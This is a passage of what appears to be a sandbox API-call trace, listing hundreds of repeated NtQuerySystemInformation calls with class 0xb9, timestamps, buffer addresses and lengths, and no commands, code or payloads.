ResultLength=0x0) [0231.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0231.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x20, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0231.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0231.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0231.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0231.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0231.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0231.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0231.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0231.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0231.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0231.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0231.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0231.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0231.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0231.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, 